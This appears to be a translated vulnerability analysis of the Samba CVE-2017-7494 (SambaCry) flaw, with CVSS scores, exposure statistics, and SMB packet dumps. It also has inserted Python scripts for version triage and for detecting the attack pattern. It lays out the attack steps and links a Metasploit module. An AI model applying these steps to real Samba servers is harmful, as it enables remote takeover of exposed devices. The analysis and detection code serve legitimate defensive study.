myhack58 / Anonymous / MYHACK58:62201786521
History: May 28, 2017 - 12:00 a.m.

Samba remote code execution vulnerability (CVE-2017-7494) - SambaCry analysis report - vulnerability warning - the black bar safety net

2017-05-28 00:00:00
Anonymous
www.myhack58.com
2246

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

0x01 Intro
On May 24, 2017 the Samba project published a security bulletin: the newly released Samba 4.6.4 fixes a serious code execution vulnerability (CVE-2017-7494) that affects every Samba version from 3.5.0 up to the fixed releases 4.6.4, 4.5.10 and 4.4.14. The flaw is an input-validation bug in rpc_server/srv_pipe.c: an attacker can use a client to upload a malicious shared library to a share on which they have write permission, then issue a request that makes the server load and run that module from outside the Samba modules directory, resulting in malicious code execution.
Samba is free software that lets UNIX-like operating systems interoperate with Microsoft Windows through the SMB/CIFS network protocol. Many commercial and home NAS (Network Attached Storage) devices, routers and other IoT storage products ship the open-source Samba to provide data access services. IPC$ (Internet Process Connection) is the shared "named pipe" resource that allows users, including anonymous users, to access the Samba server's shared resources.
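As an added triage helper (not code from the article or from Samba), the following Python script turns the version range stated above into a check: a host is affected if its Samba version is 3.5.0 or later and older than the fix on its branch (4.6.4, 4.5.10, 4.4.14). It also looks for the `nt pipe support = no` workaround that the Samba advisory published for administrators who cannot patch immediately. The assumption that branches newer than 4.6 are unaffected, and the sample banners and smb.conf, are the editor's own constructions.

```python
"""Triage helper for CVE-2017-7494 (SambaCry): decide whether a reported
Samba version is in the affected range and whether an smb.conf carries the
published workaround.  Added example, not from the original article.
Version boundaries follow the article (fixed in 4.6.4, 4.5.10, 4.4.14;
affected from 3.5.0); 'nt pipe support = no' is the workaround from the
Samba advisory."""
import re

# First fixed release per maintained branch at disclosure time.
FIXED = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
FIRST_AFFECTED = (3, 5, 0)


def parse_version(text):
    """Extract a (major, minor, patch) tuple from strings such as
    'Samba 4.5.9-Debian' or '4.4.3'.  Returns None if no version is found."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True if this Samba version falls in the vulnerable range described in
    the bulletin: 3.5.0 or later and older than the fix on its branch.
    Branches newer than 4.6 appeared after the fix and are treated as
    unaffected (assumption); 4.0-4.3 and 3.x >= 3.5.0 never received a fix
    release, so they count as affected."""
    v = parse_version(version) if isinstance(version, str) else version
    if v is None or v < FIRST_AFFECTED:
        return False
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    return branch < (4, 6)


def has_pipe_workaround(smb_conf):
    """True if the [global] section of an smb.conf sets 'nt pipe support = no',
    which disables the named-pipe request path the exploit relies on (at the
    cost of breaking some Windows client tooling)."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "global" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "nt pipe support":
                return value.strip().lower() in ("no", "false", "0")
    return False


def triage(banner, smb_conf):
    """Combine both checks into a one-word verdict for a host."""
    if not is_affected(banner):
        return "patched"
    return "mitigated" if has_pipe_workaround(smb_conf) else "vulnerable"


# Constructed sample smb.conf for a stand-alone run.
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   nt pipe support = no   ; workaround from the Samba advisory
[public]
   path = /srv/samba/public
   writable = yes
"""

if __name__ == "__main__":
    for banner in ("Samba 4.5.9-Debian", "Samba 4.6.4", "Samba 3.0.37", "Samba 4.3.11"):
        print(banner, "->", triage(banner, SAMPLE_CONF))
```

The version string can come from an SMB banner, `smbd -V`, or a package database; the smb.conf check only recognises the workaround when it is set in `[global]`, which is where the advisory places it.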
0x02 Vulnerability analysis
According to full-network scan data from the 360 Tianyan (Sky Eye) laboratory, 18883 IPs in mainland China, Hong Kong and Macao currently expose port 445; 4433 of them run a Samba service, and 3765 of those run a Samba version inside the vulnerable range, that is 85% of the Samba services seen. Taiwan and Hong Kong account for 1767 and 1853 respectively; the distribution across the remaining provinces is shown below.
![](/Article/UploadPic/2017-5/201752805553863.png?www.myhack58.com)
0x03 Vulnerability validation and analysis
Environment preparation:
![](/Article/UploadPic/2017-5/201752805553685.png?www.myhack58.com)
The Metasploit exploit module (is_known_pipename) was used for testing. Download: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb
Attack process:
1. Upload a malicious shared library, here named evil.so, to a Samba share directory on which the attacker has write access;
2. The attacker brute-forces the absolute path of the shared directory and requests the library uploaded in step 1 from the IPC$ (named pipe) resource, using its absolute path on the server as the file name, "/path/to/evil.so";
3. The server mistakenly loads the resource file "/path/to/evil.so" as an IPC$ (named pipe) resource and runs it, triggering the vulnerability.
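The three steps above leave a recognisable two-packet pattern on the wire, and the following detection logic is an added example (editor's code, not from the article, Metasploit or Samba) that looks for it over flattened SMB request records: an ELF shared object (magic bytes `7f454c46`, visible at the start of the upload data later in the write-up) written to a non-IPC$ share, followed by an NT Create on IPC$ whose pipe name contains a path separator. The pipe-name test mirrors the check the upstream fix added to is_known_pipename(), which refuses any pipe name containing "/". The record layout, the session key (User ID, Process ID) and the pipe name in the sample are the editor's own constructions modelled on packets 51 and 59 of the write-up.

```python
"""Detection logic for the two-step CVE-2017-7494 pattern: (1) an ELF shared
object is written to a writable share, then (2) the same session opens a
named pipe on IPC$ whose name is an absolute filesystem path.  Added
example, not from the article or Samba; each record is a hand-constructed
flattening of the SMB fields shown in the packet dumps."""
from collections import defaultdict

ELF_MAGIC = bytes.fromhex("7f454c46")   # \x7fELF, the first bytes of any ELF file
IPC_SHARE = "IPC$"


def is_bad_pipename(name):
    """Mirror of the check the upstream fix added to is_known_pipename():
    legitimate pipe names (srvsvc, samr, ...) never contain a path
    separator, so any '/' means a filesystem path is being smuggled in."""
    return "/" in name


def share_of(tree_path):
    """'\\\\192.168.119.155\\public' -> 'public'."""
    return tree_path.rstrip("\\").split("\\")[-1]


def scan(records):
    """Walk SMB request records in capture order and return alerts.
    Each record is a dict with keys: no, cmd, tree, uid, pid, name, data.
    An alert fires when a session (uid, pid) opens an IPC$ pipe with a
    path-like name; 'elf_upload_seen' is set if the same session earlier
    wrote ELF bytes to a non-IPC$ share."""
    uploads = defaultdict(list)   # (uid, pid) -> packet numbers of ELF writes
    alerts = []
    for r in records:
        session = (r["uid"], r["pid"])
        share = share_of(r["tree"])
        if r["cmd"] == "Write AndX" and share != IPC_SHARE \
                and r.get("data", b"").startswith(ELF_MAGIC):
            uploads[session].append(r["no"])
        elif r["cmd"] == "NT Create AndX" and share == IPC_SHARE \
                and is_bad_pipename(r["name"]):
            alerts.append({
                "packet": r["no"],
                "session": session,
                "pipename": r["name"],
                "elf_upload_seen": bool(uploads[session]),
                "upload_packets": list(uploads[session]),
            })
    return alerts


# Constructed records modelled on packets 51 and 59 of the write-up; the
# benign srvsvc open and the absolute pipe name are invented for the example.
SAMPLE = [
    {"no": 51, "cmd": "Write AndX", "tree": r"\\192.168.119.155\public",
     "uid": 62509, "pid": 51988, "name": r"\rDfDKbgV.so",
     "data": bytes.fromhex("7f454c4602010100000000000000000003003e00")},
    {"no": 55, "cmd": "NT Create AndX", "tree": r"\\192.168.119.155\IPC$",
     "uid": 62509, "pid": 51988, "name": r"\srvsvc", "data": b""},
    {"no": 59, "cmd": "NT Create AndX", "tree": r"\\192.168.119.155\IPC$",
     "uid": 62509, "pid": 51988, "name": "/srv/samba/public/rDfDKbgV.so",
     "data": b""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The pipe-name check alone is enough to flag the request, since no legitimate RPC pipe is named with a slash; the ELF-upload correlation is there to raise confidence and to point the responder at the file that was dropped on the share.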
1) Upload the malicious shared library to the server's public share directory
![](/Article/UploadPic/2017-5/201752805553640.png?www.myhack58.com)
Packet 51, a Write AndX Request carrying the written data, is shown below:
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
[Response in: 52]
SMB Command: Write AndX (0x2f)
Error Class: Success (0x00)

Tree ID: 51295 (\\192.168.119.155\public) # Tree ID of the target machine's shared file path
Process ID: 51988
User ID: 62509
Multiplex ID: 27235
Write AndX Request (0x2f)
Word Count (WCT): 14
AndXCommand: No further commands (0xff)
Reserved: 00
AndXOffset: 0
FID: 0xef37 (\rDfDKbgV.so) # FID of the malicious shared library file

[File RW Length: 476] # size of the written file
Byte Count (BCC): 476
Data (476 bytes) # uploaded binary data
Data: 7f454c4602010100000000000000000003003e0001000000…
[Length: 476]
2) Request the malicious shared library through a named pipe
![](/Article/UploadPic/2017-5/201752805553810.png?www.myhack58.com)
Packet 59, an NT Create AndX Request asking for the named-pipe resource, is as follows:
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
SMB Command: NT Create AndX (0xa2)

Tree ID: 19967 (\\192.168.119.155\IPC$) # using the named-pipe (IPC$) tree here is essential
Process ID: 51988
User ID: 62509
Multiplex ID: 27235
NT Create AndX Request (0xa2)
Word Count (WCT): 24
AndXCommand: No further commands (0xff)
Reserved: 00
AndXOffset: 0
Reserved: 00
